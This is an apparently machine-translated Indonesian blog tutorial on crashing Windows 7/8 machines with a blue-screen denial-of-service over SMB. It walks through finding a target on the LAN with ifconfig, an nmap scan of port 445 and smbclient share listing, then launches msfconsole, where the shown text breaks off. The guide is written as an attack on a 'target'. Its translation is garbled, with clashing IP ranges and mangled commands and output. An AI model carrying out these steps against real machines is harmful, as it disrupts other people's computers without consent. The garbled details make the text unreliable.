Selamat datang kembali di
BELAJAR LINUX, Kali ini saya akan berbagi tutorial yang agak kejam juga sih untuk para pengguna windows 7 dan 8, bagaimana memunculkan BSOD alias BLUE SCREAN OF DEATH, (pengguna windows pada panik nih) kalo ane sih bukan hacker, tapi
pakar seo tangerang yang juga kebetulan suka sama pentest.
ok pertam perhatikan hal berikut dulu, diharapkan pelajari step by step :
Berikut adalah beberapa BSOD yang saya dapatkan dari InternetBSOD pada Windows 8BSOD pada Windows SebelumnyaPersyaratan:Kondisi
Anda harus berada dalam satu LAN dengan target Anda.
Anda harus tahu apa target Anda IP.
Firewall target Anda harus dalam keadaan tidak aktif.
Target share nya / folder nya di LAN.
Anda harus tahu apa folder yang berbagi mereka.
Anda memiliki otak bekerja.Alat
Jaringan mapper (Anda dapat menggunakan Nmap untuk sesi pengumpulan informasi)
Metasploit (yang dapat ditemukan di sini)Cara:1. Cari tahu apa yang Anda alamat IP:Anda dapat mengetahui apa alamat IP Anda dengan mengikuti perintah :
ifconfig wlan0
CATATAN: wlan0 adalah interface umum untuk jaringan nirkabel di linux. Sesuaikan antarmuka jaringan Anda sendiri. Jika Anda menggunakan jaringan kabel, itu harus eth0, dllDalam tutorial ini, saya menggunakan VMWare untuk diuji apakah metode ini bekerja atau tidak. Dengan demikian tidak akan membuat merugikan siapa pun.
Output:
ifconfig wlan0vmnet8 Link encap: Ethernet HWaddr 00:50:56: c0: 00:08 inet addr: 192.168 .222.1
Bcast: 192.168.222.255 Mask: 255.255.255.0 inet6 addr: fe80 :: 250:56
ff: fec0: 8/64 Cakupan Link UP BROADCAST MULTICAST MTU MENJALANKAN: 1500
Metric: 1 RX paket: 84 errors: 0 menjatuhkan: 0 overruns:
0 frame: 0 TX paket: 72 errors: 0 menjatuhkan: 0 overruns: 0 pembawa: 0
tabrakan: 0 txqueuelen: 1000 RX bytes: 0 (0.0 B) TX bytes: 0 (0.0 B)
Jadi, alamat IP adalah 192.168.222.12. Cari tahu target Anda Alamat IPPada bagian ini, Anda dapat menggunakan alat yang memberikan Anda kemampuan penilaian jaringan. Dalam kasus ini, saya menggunakan Nmap yang lebih cepat (karena bisa lari dari konsol), dan lebih handal.Kembali
dengan kebutuhan, kita perlu mengetahui apakah target kami berada di
belakang firewall atau tidak, kita juga perlu mengetahui apakah target
kami berbagi / nya folder nya atau tidak. Dengan demikian akan membuat pernyataan bahwa:Pengguna
Windows yang tidak menggunakan firewall, dapat menjadi ping-ed oleh
seseorang, dan mereka membuka port pada 445 (layanan smb)Jadi mari kita memeriksa yang / membuka nya / 445 port-nya dengan mengikuti perintahCommand:
nmap 192.168.222.1-255-p 445Masih ingat alamat IP saya? Ya, sehingga saya ketik 192.168.222.1 pada perintah Nmap saya. Jadi, bagaimana -255? Ini adalah rentang maks alamat IP. Jadi dalam hal ini, saya ingin memindai jaringan dari 192.168.222.1 sampai 192.168.1.255. Ya, itu adalah alamat IP pada seluruh LAN itu.
Dan bagaimana dengan p-445? Ini port. Ya, aku hanya memindai IP dengan membuka 445 pelabuhan di LAN saya. Dengan demikian akan membuat hasil lebih cepat karena aku akan melewatkan setiap IP dengan 445 port tertutup.
Cobalah untuk menyesuaikan alamat IP Anda. Contoh: jika alamat IP Anda adalah 10.20.0.33, maka Anda ketik perintah berikut.
nmap 10.20.0.1-255-p 445Cobalah untuk menghapus nomor ekor, dan mengganti dengan 1. Jadi Anda dapat memindai alamat IP di atas Anda (10.20.0.1 ke 10.20.0.32).
Jadi setelah saya memindai jaringan saya, di sini adalah output
Command:
nmap 10.20.0.1-255-p 445
Mulai
Nmap 6.00 (http://nmap.org) di 2013/05/30 20:09 laporan WITNmap
memindai 192.168.222.1Host terserah (0.0014s latency). PORT NEGARA
SERVICE445/tcp ditutup microsoft-dsLaporan Nmap scan 192.168.222.128Host terserah (0.0021s latency). PORT NEGARA SERVICE445/tcp terbuka microsoft-dsNmap dilakukan: 255 alamat IP (2 host up) discan dalam 45.20 detikJadi, kami memiliki 192.168.222.128 dengan membuka 445 pelabuhan.
3. Cari tahu, apakah dia / dia berbagi / nya folder nya
Anda
mungkin bertanya-tanya, mengapa target kami harus berbagi / nya folder
nya sehingga kita dapat membuat / nya PC / Laptop mendapatkan BSOD? Nah, dalam hal ini, saya akan menggunakan metode DOS. Yang bisa membuat sistem turun dengan mengirimkan kode berbahaya dari header permintaan ke layanan seseorang. Jadi bagaimana untuk mengetahui apakah target pangsa kami nya / folder nya? Nah, Anda dapat menggunakan perintah sederhana ini.
Command:
smbclient-L \ \ TARGET IP-NDalam hal ini, target saya IP adalah 192.168.222.128. Jadi perintah saya terlihat seperti ini
Command:
smbclient-L \ \ 192.168.222.128-NDan itu akan memberikan output seperti ini
Command:smbclient-L \ \
192.168.222.128-NDomain = [MICROSOFT] OS = [windows 5.1] Server = [Windows 2000 LAN Manager]
Jenis
sharename Komentar -------------------- Rahasia Stuff Disk E $ Disk
default share IPC $ IPC IPC jauh ADMIN $ Disk C $ Disk default
permintaan sharesession ke 192,168 remote Admin. 222,128
gagal (nama tidak hadir Disebut) permintaan sesi ke 192 gagal (nama
Called tidak hadir) Domain = [MICROSOFT] OS = [windows 5.1] Server =
[Windows 2000 LAN Manager]
Server Komentar ----------------
Workgroup Guru ----------------
Kita perlu berbagi nama dalam output ini. Kita bisa menggunakan salah satu dari mereka, dalam hal ini saya akan menggunakan Rahasia Stuff.
4. Luncurkan Serangan BSOD
Mulai dari konsol metasploit, dengan mengikuti perintah
Command: - [~] - [2013/05/30 07:37:36] └ ─ [] msfconsole
Dan setup pilihan Anda